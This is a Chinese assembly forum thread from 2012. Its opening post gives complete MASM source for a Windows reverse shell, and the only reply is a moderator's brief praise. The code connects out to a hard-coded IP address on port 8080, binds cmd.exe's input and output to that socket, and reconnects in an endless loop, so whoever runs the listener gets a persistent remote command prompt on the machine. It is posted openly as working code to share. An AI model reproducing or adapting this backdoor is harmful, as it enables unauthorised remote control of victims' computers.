MASM汇编反向连接shell源码 - 汇编论坛

dgz333

等　级：新手上路
帖　子：4
专家分：0
注　册：2011-11-10
结帖率：66.67%

楼主

已结贴√ 问题点数：10 回复次数：2

MASM汇编反向连接shell源码

程序代码：

.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
include ws2_32.inc
include masm32.inc
includelib ws2_32.lib
includelib kernel32.lib
includelib masm32.lib 

.data
  cmd     db "cmd",0
  UrIP    db "24.23.23.23",0
  port    db "8080",0
.data?
  sinfo   STARTUPINFO<>
  pi      PROCESS_INFORMATION<>
  sin     sockaddr_in<>
  WSAD    WSADATA<>
  Wsocket dd ?
.code
start:
    invoke WSAStartup, 101h, addr WSAD 
    invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0
           mov Wsocket, eax
           mov sin.sin_family, 2
    invoke atodw, addr port
    invoke htons, eax
           mov sin.sin_port, ax
    invoke gethostbyname, addr UrIP
          mov eax, [eax+12]
          mov eax, [eax]
          mov eax, [eax]
          mov sin.sin_addr, eax

          mov eax,Wsocket
          mov sinfo.hStdInput,eax
          mov sinfo.hStdOutput,eax
          mov sinfo.hStdError,eax     
          mov sinfo.cb,sizeof STARTUPINFO
          mov sinfo.dwFlags,STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES

 shellagain:
    invoke connect, Wsocket, addr sin , sizeof(sockaddr_in) 
    invoke CreateProcess,NULL,addr cmd,NULL,NULL,TRUE,8000040h,NULL,NULL,addr sinfo,addr pi
    invoke WaitForSingleObject,pi.hProcess,INFINITE
    jmp shellagain

 ret
end start

[ 本帖最后由 dgz333 于 2012-11-15 21:43 编辑 ]

2012-11-15 21:39

有容就大

来　自：东土大唐
等　级：版主
威　望：74
帖　子：9048
专家分：14309
注　册：2011-11-11

第 3 楼

得分:5

膜拜 WinSocket

梅尚程荀
马谭杨奚

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

2012-11-15 23:30